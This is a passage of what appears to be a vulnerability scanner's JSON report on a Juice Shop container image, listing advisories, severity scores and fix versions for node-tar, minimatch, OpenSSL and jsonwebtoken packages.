(semantic)"},"fix":{"suggestedVersion":"7.5.7"}}],"artifact":{"id":"pkg:npm/tar@4.4.19?package-id=f42c59d94c10b95d","name":"tar","version":"4.4.19","type":"npm","locations":[{"path":"/juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:4.4.19:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:4.4.19:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@4.4.19","upstreams":[]}},{"vulnerability":{"id":"GHSA-34x7-hfp2-rc4v","dataSource":"https://github.com/advisories/GHSA-34x7-hfp2-rc4v","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v","https://nvd.nist.gov/vuln/detail/CVE-2026-24842","https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46"],"description":"node-tar Vulnerable to Arbitrary File Creation/Overwrite via Hardlink Path Traversal","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N","metrics":{"baseScore":8.2,"exploitabilityScore":2.9,"impactScore":4.8},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-24842","epss":0.00519,"percentile":0.39834,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-24842","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-24842","cwe":"CWE-59","source":"security-advisories@github.com","type":"Primary"}],"fix":{"versions":["7.5.7"],"state":"fixed","available":[{"version":"7.5.7","date":"2026-01-29","kind":"first-observed"}]},"advisories":[],"risk":0.40741499999999997},"relatedVulnerabilities":[{"id":"CVE-2026-24842","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-24842","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46","https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v"],"description":"node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.","cvss":[{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N","metrics":{"baseScore":8.2,"exploitabilityScore":2.9,"impactScore":4.8},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-24842","epss":0.00519,"percentile":0.39834,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-24842","cwe":"CWE-22","source":"security-advisories@github.com","type":"Primary"},{"cve":"CVE-2026-24842","cwe":"CWE-59","source":"security-advisories@github.com","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"6.2.1"}},"found":{"vulnerabilityID":"GHSA-34x7-hfp2-rc4v","versionConstraint":"<7.5.7 (semantic)"},"fix":{"suggestedVersion":"7.5.7"}}],"artifact":{"id":"pkg:npm/tar@6.2.1?package-id=09de397807f7641f","name":"tar","version":"6.2.1","type":"npm","locations":[{"path":"/juice-shop/node_modules/sqlite3/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:6.2.1:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:6.2.1:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@6.2.1","upstreams":[]}},{"vulnerability":{"id":"GHSA-3ppc-4f35-3m26","dataSource":"https://github.com/advisories/GHSA-3ppc-4f35-3m26","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26","https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5","https://nvd.nist.gov/vuln/detail/CVE-2026-26996"],"description":"minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","metrics":{"baseScore":8.7},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-26996","epss":0.005,"percentile":0.38675,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-26996","cwe":"CWE-1333","source":"security-advisories@github.com","type":"Primary"}],"fix":{"versions":["3.1.3"],"state":"fixed","available":[{"version":"3.1.3","date":"2026-03-04","kind":"first-observed"}]},"advisories":[],"risk":0.40499999999999997},"relatedVulnerabilities":[{"id":"CVE-2026-26996","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-26996","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5","https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26"],"description":"minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":8.7},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-26996","epss":0.005,"percentile":0.38675,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-26996","cwe":"CWE-1333","source":"security-advisories@github.com","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"minimatch","version":"3.0.5"}},"found":{"vulnerabilityID":"GHSA-3ppc-4f35-3m26","versionConstraint":"<3.1.3 (semantic)"},"fix":{"suggestedVersion":"3.1.3"}}],"artifact":{"id":"pkg:npm/minimatch@3.0.5?package-id=a7d9f58fa9223af7","name":"minimatch","version":"3.0.5","type":"npm","locations":[{"path":"/juice-shop/node_modules/replace/node_modules/minimatch/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:minimatch_project:minimatch:3.0.5:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/minimatch@3.0.5","upstreams":[]}},{"vulnerability":{"id":"CVE-2026-34183","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-34183","namespace":"debian:distro:debian:13","severity":"High","urls":[],"description":"Issue summary: Remote peer may exhaust heap memory of the QUIC server or client by flooding it with packets containing PATH_CHALLENGE frames. Impact summary: A malicious remote peer can cause an unbounded memory allocation which can lead to an abnormal termination of the application acting as a QUIC client or server and a Denial of Service. A remote peer may exhaust heap memory by flooding the local QUIC stack with PATH_CHALLENGE frames. The local QUIC stack allocates a PATH_RESPONSE frame for every PATH_CHALLENGE it receives. The allocated PATH_RESPONSE frame gets freed only when the remote peer acknowledges reception of the PATH_RESPONSE frame which will not be done by a malicious peer. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue. The QUIC stack is outside of OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-34183","epss":0.00531,"percentile":0.40486,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-34183","cwe":"CWE-1325","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-10","kind":"first-observed"}]},"advisories":[],"risk":0.39825},"relatedVulnerabilities":[{"id":"CVE-2026-34183","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-34183","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/openssl/openssl/commit/5b306efb0b3779dfdd0803b4afc9d08c91f11517","https://github.com/openssl/openssl/commit/7d06955ebe0ecf8adfd4c1e92018586da47ef9ac","https://github.com/openssl/openssl/commit/d2e9efbe4900a373227deb136e8665401404ffac","https://github.com/openssl/openssl/commit/fbaa83859c01ad64f497b757aaf51be7d05ed9eb","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue summary: Remote peer may exhaust heap memory of the QUIC\nserver or client by flooding it with packets containing PATH_CHALLENGE\nframes.\n\nImpact summary: A malicious remote peer can cause an unbounded\nmemory allocation which can lead to an abnormal termination of the\napplication acting as a QUIC client or server and a Denial of Service.\n\nA remote peer may exhaust heap memory by flooding the local\nQUIC stack with PATH_CHALLENGE frames. The local QUIC stack\nallocates a PATH_RESPONSE frame for every PATH_CHALLENGE it receives.\nThe allocated PATH_RESPONSE frame gets freed only when the remote\npeer acknowledges reception of the PATH_RESPONSE frame which will\nnot be done by a malicious peer.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by\nthis issue. The QUIC stack is outside of OpenSSL FIPS module\nboundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-34183","epss":0.00531,"percentile":0.40486,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-34183","cwe":"CWE-1325","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-34183","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"CVE-2026-34180","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-34180","namespace":"debian:distro:debian:13","severity":"High","urls":[],"description":"Issue summary: Parsing a crafted DER-encoded ASN.1 structure with a primitive element whose content exceeds 2 gigabytes in length may cause a heap buffer over-read on 64-bit Unix and Unix-like platforms. Impact summary: The heap buffer over-read may crash the application (Denial of Service) or to load into the decoded ASN.1 object contents of memory beyond the end of the input buffer. More typically such ASN.1 elements would instead be truncated. An integer truncation in OpenSSL's ASN.1 decoder causes the content length of an ASN.1 primitive element to be mishandled when it exceeds 2 gigabytes. In the worst case the truncated length is treated as a request to scan the binary content for a terminating zero byte, possibly causing OpenSSL to read either less than or beyond the end of the allocated buffer. Applications that pass attacker-supplied data to d2i_X509(), d2i_PKCS7(), or any other d2i_* decoding function are affected. OpenSSL's own command-line tools are not vulnerable, as data read through the BIO layer is checked before it reaches the affected code. The issue only affects 64-bit Unix and Unix-like platforms; 32-bit platforms and 64-bit Windows are not affected. The FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-34180","epss":0.00505,"percentile":0.39002,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-34180","cwe":"CWE-125","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-09","kind":"advisory"}]},"advisories":[{"id":"DSA-6335-1","link":"https://security-tracker.debian.org/tracker/DSA-6335-1"}],"risk":0.37875000000000003},"relatedVulnerabilities":[{"id":"CVE-2026-34180","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-34180","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/openssl/openssl/commit/1c6908e4fa5fa568752221d8eaf561a809751e5d","https://github.com/openssl/openssl/commit/cbe418ae978539cf14a398a207dba834c0e93e83","https://github.com/openssl/openssl/commit/d93853c42110d6319e3df07842b488cb9f7ac5ff","https://github.com/openssl/openssl/commit/da5d62af75f69d6fbf7803743d7c56ac75461e43","https://github.com/openssl/openssl/commit/f696c73c3e61b8c502d040af62e690c060908a16","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue summary: Parsing a crafted DER-encoded ASN.1 structure with a primitive\nelement whose content exceeds 2 gigabytes in length may cause a heap buffer\nover-read on 64-bit Unix and Unix-like platforms.\n\nImpact summary: The heap buffer over-read may crash the application (Denial of\nService) or to load into the decoded ASN.1 object contents of memory beyond the\nend of the input buffer. More typically such ASN.1 elements would instead be\ntruncated.\n\nAn integer truncation in OpenSSL's ASN.1 decoder causes the content length of\nan ASN.1 primitive element to be mishandled when it exceeds 2 gigabytes. In the\nworst case the truncated length is treated as a request to scan the binary\ncontent for a terminating zero byte, possibly causing OpenSSL to read either\nless than or beyond the end of the allocated buffer.\n\nApplications that pass attacker-supplied data to d2i_X509(), d2i_PKCS7(), or\nany other d2i_* decoding function are affected. OpenSSL's own command-line\ntools are not vulnerable, as data read through the BIO layer is checked before\nit reaches the affected code. The issue only affects 64-bit Unix and Unix-like\nplatforms; 32-bit platforms and 64-bit Windows are not affected.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by this issue,\nas the affected code is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-34180","epss":0.00505,"percentile":0.39002,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-34180","cwe":"CWE-125","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-34180","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"GHSA-hjrf-2m68-5959","dataSource":"https://github.com/advisories/GHSA-hjrf-2m68-5959","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959","https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3","https://nvd.nist.gov/vuln/detail/CVE-2022-23541","https://github.com/auth0/node-jsonwebtoken/releases/tag/v9.0.0","https://security.netapp.com/advisory/ntap-20240621-0007"],"description":"jsonwebtoken's insecure implementation of key retrieval function could lead to Forgeable Public/Private Tokens from RSA to HMAC","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L","metrics":{"baseScore":5,"exploitabilityScore":1.7,"impactScore":3.4},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-23541","epss":0.00753,"percentile":0.50113,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-23541","cwe":"CWE-287","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-23541","cwe":"CWE-1259","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-23541","cwe":"NVD-CWE-Other","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["9.0.0"],"state":"fixed","available":[{"version":"9.0.0","date":"2022-12-23","kind":"first-observed"}]},"advisories":[],"risk":0.3765},"relatedVulnerabilities":[{"id":"CVE-2022-23541","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2022-23541","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3","https://github.com/auth0/node-jsonwebtoken/releases/tag/v9.0.0","https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959","https://security.netapp.com/advisory/ntap-20240621-0007/"],"description":"jsonwebtoken is an implementation of JSON Web Tokens. Versions `<= 8.5.1` of `jsonwebtoken` library can be misconfigured so that passing a poorly implemented key retrieval function referring to the `secretOrPublicKey` argument from the readme link will result in incorrect verification of tokens. There is a possibility of using a different algorithm and key combination in verification, other than the one that was used to sign the tokens. Specifically, tokens signed with an asymmetric public key could be verified with a symmetric HS256 algorithm. This can lead to successful validation of forged tokens. If your application is supporting usage of both symmetric key and asymmetric key in jwt.verify() implementation with the same key retrieval function. This issue has been patched, please update to version 9.0.0.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","metrics":{"baseScore":6.3,"exploitabilityScore":2.9,"impactScore":3.4},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L","metrics":{"baseScore":5,"exploitabilityScore":1.7,"impactScore":3.4},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-23541","epss":0.00753,"percentile":0.50113,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-23541","cwe":"CWE-287","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-23541","cwe":"CWE-1259","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-23541","cwe":"NVD-CWE-Other","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"jsonwebtoken","version":"0.1.0"}},"found":{"vulnerabilityID":"GHSA-hjrf-2m68-5959","versionConstraint":"<=8.5.1 (semantic)"},"fix":{"suggestedVersion":"9.0.0"}}],"artifact":{"id":"pkg:npm/jsonwebtoken@0.1.0?package-id=c29669d438fb9e38","name":"jsonwebtoken","version":"0.1.0","type":"npm","locations":[{"path":"/juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:auth0:jsonwebtoken:0.1.0:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/jsonwebtoken@0.1.0","upstreams":[]}},{"vulnerability":{"id":"GHSA-hjrf-2m68-5959","dataSource":"https://github.com/advisories/GHSA-hjrf-2m68-5959","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959","https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3","https://nvd.nist.gov/vuln/detail/CVE-2022-23541","https://github.com/auth0/node-jsonwebtoken/releases/tag/v9.0.0","https://security.netapp.com/advisory/ntap-20240621-0007"],"description":"jsonwebtoken's insecure implementation of key retrieval function could lead to Forgeable Public/Private Tokens from RSA to HMAC","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L","metrics":{"baseScore":5,"exploitabilityScore":1.7,"impactScore":3.4},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-23541","epss":0.00753,"percentile":0.50113,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-23541","cwe":"CWE-287","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-23541","cwe":"CWE-1259","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-23541","cwe":"NVD-CWE-Other","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["9.0.0"],"state":"fixed","available":[{"version":"9.0.0","date":"2022-12-23","kind":"first-observed"}]},"advisories":[],"risk":0.3765},"relatedVulnerabilities":[{"id":"CVE-2022-23541","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2022-23541","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3","https://github.com/auth0/node-jsonwebtoken/releases/tag/v9.0.0","https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959","https://security.netapp.com/advisory/ntap-20240621-0007/"],"description":"jsonwebtoken is an implementation of JSON Web Tokens. Versions `<= 8.5.1` of `jsonwebtoken` library can be misconfigured so that passing a poorly implemented key retrieval function referring to the `secretOrPublicKey` argument from the readme link will result in incorrect verification of tokens. There is a possibility of using a different algorithm and key combination in verification, other than the one that was used to sign the tokens. Specifically, tokens signed with an asymmetric public key could be verified with a symmetric HS256 algorithm. This can lead to successful validation of forged tokens. If your application is supporting usage of both symmetric key and asymmetric key in jwt.verify() implementation with the same key retrieval function. This issue has been patched, please update to version 9.0.0.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","metrics":{"baseScore":6.3,"exploitabilityScore":2.9,"impactScore":3.4},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L","metrics":{"baseScore":5,"exploitabilityScore":1.7,"impactScore":3.4},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-23541","epss":0.00753,"percentile":0.50113,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-23541","cwe":"CWE-287","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-23541","cwe":"CWE-1259","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-23541","cwe":"NVD-CWE-Other","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"jsonwebtoken","version":"0.4.0"}},"found":{"vulnerabilityID":"GHSA-hjrf-2m68-5959","versionConstraint":"<=8.5.1 (semantic)"},"fix":{"suggestedVersion":"9.0.0"}}],"artifact":{"id":"pkg:npm/jsonwebtoken@0.4.0?package-id=1e23bc54c16fbe6d","name":"jsonwebtoken","version":"0.4.0","type":"npm","locations":[{"path":"/juice-shop/node_modules/jsonwebtoken/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:auth0:jsonwebtoken:0.4.0:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/jsonwebtoken@0.4.0","upstreams":[]}},{"vulnerability":{"id":"GHSA-7r86-cg39-jmmj","dataSource":"https://github.com/advisories/GHSA-7r86-cg39-jmmj","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj","https://nvd.nist.gov/vuln/detail/CVE-2026-27903","https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748"],"description":"minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-27903","epss":0.00499,"percentile":0.3861,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-27903","cwe":"CWE-407","source":"security-advisories@github.com","type":"Primary"}],"fix":{"versions":["3.1.3"],"state":"fixed","available":[{"version":"3.1.3","date":"2026-02-27","kind":"first-observed"}]},"advisories":[],"risk":0.37424999999999997},"relatedVulnerabilities":[{"id":"CVE-2026-27903","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-27903","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj"],"description":"minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the 